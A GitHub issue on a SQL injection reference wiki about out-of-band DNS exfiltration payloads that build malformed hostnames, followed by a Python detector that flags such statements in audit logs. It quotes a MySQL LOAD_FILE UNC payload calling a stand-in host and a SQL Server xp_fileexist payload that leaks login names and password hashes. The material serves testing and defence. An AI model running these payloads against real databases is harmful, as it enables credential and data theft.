NetSPI/SQLInjectionWiki

DNS request command is malformed

aph3rson opened this issue · 1 comments

SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\'))

Doing this will create a hostname like rootyourhost.com, which won't work for things like Burp Collaborator, or any customized DNS server.

I'll make a PR for this shortly.

SQL Server is also affected:

DECLARE @host varchar(800);
select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + 'netspi.com' from sys.sql_logins;
exec('xp_fileexist "\' + @host + 'c$boot.ini"');

Same issue.
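From the monitoring side, both statements quoted in this thread share a shape that can be flagged in database audit logs whether or not the resulting hostname is well formed. The sketch below is an added example, not code from this issue or from the wiki; the function name `scan`, the output fields and the sample statements are assumptions constructed for illustration.

```python
import re

# Functions named in this issue that make the database server resolve a UNC path.
UNC_SINKS = re.compile(r"\b(load_file|xp_fileexist)\b", re.IGNORECASE)
# A quote followed by two or more backslashes: the start of a UNC path literal.
UNC_PREFIX = re.compile(r"""['"]\\{2,}""")
# Host assembled at run time: concat(...) in MySQL, 'literal' + operand in T-SQL.
CONCAT = re.compile(r"""\bconcat\s*\(|['"]\s*\+""", re.IGNORECASE)
# Domain-like string literal, with or without a leading dot.
HOST_LITERAL = re.compile(r"'\.?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.IGNORECASE)


def scan(statements):
    """Return one finding per statement that passes a UNC path to a known sink."""
    findings = []
    for number, stmt in enumerate(statements, 1):
        sink = UNC_SINKS.search(stmt)
        if not sink or not UNC_PREFIX.search(stmt):
            continue  # local file reads and ordinary queries are not flagged
        host = HOST_LITERAL.search(stmt)
        findings.append({
            "line": number,
            "sink": sink.group(1).lower(),
            "dynamic_host": bool(CONCAT.search(stmt)),
            # Search DNS logs for this value as a plain string suffix, not as a
            # parent zone: with the form reported here the looked-up name is
            # like "rootyourhost.com", which is not a subdomain of the literal.
            "dns_pivot": host.group(1).lower() if host else None,
        })
    return findings


# Constructed audit-log statements (not real log data).
SAMPLE = [
    r"SELECT LOAD_FILE(concat('\\\\',(QUERY_WITH_ONLY_ONE_ROW), 'yourhost.com\\'))",
    r"SELECT LOAD_FILE('/var/lib/mysql-files/report.csv')",
    r'''exec('xp_fileexist "\\' + @host + 'c$boot.ini"');''',
    r"SELECT name FROM sys.sql_logins",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `dns_pivot` of `None` means the host was built in an earlier statement (the `@host` variable above), so the preceding statements of the same session need reviewing.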